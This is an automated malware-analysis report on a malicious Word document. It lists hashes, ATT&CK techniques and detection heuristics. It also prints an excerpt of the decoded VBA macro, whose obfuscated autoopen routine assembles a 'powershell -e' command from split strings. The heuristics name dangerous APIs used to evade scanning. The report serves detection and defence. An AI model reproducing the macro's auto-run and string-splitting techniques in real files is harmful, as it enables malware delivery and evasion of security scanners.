Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2005ac2c423a81d…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 199.1 KB
Created: 2019-03-13 16:28:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 433776e93c299b57f98b8362c42bd112
SHA-1: 67befad5932143dae949de09096f3dd1ea007e4b
SHA-256: d2005ac2c423a81d101e6ffc535e593b47c55aca7ee52aef03c591504e24bcfc
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros with an AutoOpen function, indicating an attempt to execute code automatically as soon as the document is opened. Heuristics indicate obfuscation techniques and the use of GetObject to execute code, likely in order to download and run a second-stage payload. The reassembled token 'Win32_Process' (a WMI class) suggests the macro attempts to create or interact with system processes through WMI.

Heuristics (8)

  • ClamAV: Doc.Malware.00536d-6895331-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6895331-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The macro project defines an AutoOpen procedure, which Word runs automatically when the document is opened.
  • GetObject call [high] OLE_VBA_GETOBJ
    The macro code calls GetObject, which returns a reference to a COM/WMI object and is a common way for a macro to obtain an object through which it can run code.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body). This is the standard DrawingML schema namespace URI, not a download location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40124 bytes
SHA-256: 1b08abd0fda58ba8d5f6d838f3853f115f3559eb3ef48a12eae256707229ff27
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "IxABADcA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function WBcAQX()
   If ZAA4XGBc = CQZACkA Then
tCABAAA = CVar(BAwQAwC1)
lABGQGAD = v1XoUUc + CInt(aUADocx) * 376145393 * CBool(510172313) + 269236638 / Round(iBkcZA1o) - bXGQA4D + Sqr(836029335) - 544699844 * CByte(227624417)
pkcQCUQ1 = CInt(wAA_DA)
End If
   If lUAAkw = XDAAQAC_ Then
w4A_AAU = CVar(BQQCAwU)
cA1kCGAA = YAAABQc + CInt(Ow1DQoA) * 167860640 * CBool(663326753) + 138245169 / Round(IAcAQkAA) - vQAkQDDw + Sqr(386077413) - 944435466 * CByte(734936888)
mAAQwXZD = CInt(sAUGQQA)
End If
   If hUAQ4co = sZ1BAD Then
OAX4ADA = CVar(rZQA1_)
MADAw_1U = X_AAcDB + CInt(hoxAA4Ak) * 370009253 * CBool(28595676) + 895682958 / Round(WAAB_A) - vAABBGAB + Sqr(529203338) - 196463654 * CByte(320675936)
KCw4xUQ = CInt(iUCUAxDk)
End If
   If scAAUAZ = iAAZAA Then
oUUGB_ZC = CVar(LQBAQZ)
oDA1AxcQ = jAUBGxZ + CInt(mxZAA1) * 425810290 * CBool(264318893) + 266007088 / Round(pC4QAoA) - jUAAx1DB + Sqr(662450236) - 876384753 * CByte(809366796)
QAC1AA = CInt(nUDQGG)
End If
   If so_CBDZA = tD_1AAAB Then
iUUQCQG = CVar(M4A_DwC)
MAADZBBA = jc1XcA + CInt(IUcAUQ1) * 799183729 * CBool(265736682) + 839872953 / Round(DBBA41) - uAAUAA + Sqr(42187556) - 463188169 * CByte(948233883)
PwQQZA = CInt(zAU1xD4)
End If
   If NDUABww = WDxUoo Then
cA4XBc = CVar(b_GUcA)
tXDAZ_ = GQUAAAAU + CInt(vABXUDoA) * 312203550 * CBool(771823981) + 556638519 / Round(FUCBUZ) - DABAQ1XQ + Sqr(482776729) - 403915218 * CByte(952674628)
WwZG_A = CInt(IBXoZ4)
End If
   If iAQxAAAB = uA1DQZ Then
V4_A14 = CVar(p4xDAA4)
UBGD1B = iB4DQAAU + CInt(IA4ZAAAA) * 829831994 * CBool(576642899) + 988508739 / Round(PBxkCZ) - BAAUQD + Sqr(161176138) - 315299 * CByte(861027410)
DBA_AoU = CInt(CAAAB41)
End If
   If vADAkC = vxAcGAA Then
QBUADAA = CVar(pZABAAAc)
UAAAAUG = co1DAQAA + CInt(rkUUAAwA) * 337848824 * CBool(702767019) + 26288099 / Round(TQA1UAAC) - uDAZAAA + Sqr(165146029) - 286217169 * CByte(736223140)
MGBZAkkA = CInt(RXA4U_AU)
End If
End Function
Sub autoopen()
On Error Resume Next
   If pkAQA_G = nDGAAAA Then
dcBoAAA = CVar(jQCXABoo)
QAGACcC = uC4GA1 + CInt(tCCD4B4x) * 225652868 * CBool(454847503) + 560600718 / Round(OoAXDB) - jowQA4C + Sqr(93175180) - 844047926 * CByte(511010208)
hxCCQU = CInt(WUQUoX)
End If
   If rC4UwAAo = MAcxQAQ Then
BwGGAU4 = CVar(GDGAUwZw)
CAADkA = b1A_A4B + CInt(I1_1AQc) * 760843629 * CBool(789258766) + 913044794 / Round(oQQA_D) - sBQAQDAA + Sqr(644313519) - 43515168 * CByte(62628609)
kACDQAG = CInt(QwAQAQ1)
End If
dcwwUXAX (o1A4QAZ + "po" + DkABABD + "wersh" + CGGUGAw + "ell -e " + R_A4_B + mXBAoA + ZXcQoDw + sCCA1Z + CABQAGB)
   If OD1AGA1Z = IAAUBU Then
IZAAQXG = CVar(kcUDDA)
pDAxUAD = X4cAkDAA + CInt(CBBkc1) * 76033567 * CBool(588339140) + 534018374 / Round(EkoAQA1Q) - qABAADAB + Sqr(874865047) - 338221182 * CByte(928532883)
mAwwGUAA = CInt(lDZkAA)
End If
   If jQcA4xDG = qAAAAA4A Then
zBADUAc_ = CVar(XAA_oA)
vBDA_AD = zXDXAwAA + CInt(joXAAUXA) * 177073780 * CBool(743505443) + 253645357 / Round(FCkAQBD_) - YxAAkU + Sqr(418755993) - 183240419 * CByte(658297488)
vQAQ_A = CInt(vDUUXwA4)
End If
End Sub
Function Y1DBUxAZ()
   If VDACcAC = JABXwAA Then
hQBAQAXD = CVar(FU1_AAA)
zDUXAk = cBQZ1G + CInt(VGQAkA) * 914102323 * CBool(75904692) + 349616865 / Round(uDQU__) - RA4CZAAA + Sqr(512083877) - 799079151 * CByte(98523408)
X1AACDDX = CInt(qGC4UA)
End If
   If oAA14cAA = SwAQXA4 Then
RABAUZBA = CVar(F_U1AU)
cAUAxco = zAUABGCA + CInt(GAQQAoU4) * 922684687 * CBool(975250208) + 954091159 / Round(BoAX14) - vDABAQwA + Sqr(808468809) - 450687932 * CByte(17541246)
CQQQAo4U = CInt(uDXUAQZ)
End If
   If tAAD4AD = wGBBAUB Then
HUGxACQ = CVar(JAAQxQ)
IACABxA = F4wAkUQA + CInt(pB4cAw) * 182609338 * CBool(192328685) + 579762570 / Round(iAADQAA) - iABkBAA + Sqr(34526973) - 60465176 * CByte(420659956)
nUwBBA = CInt(TBGAZ_1
... (truncated)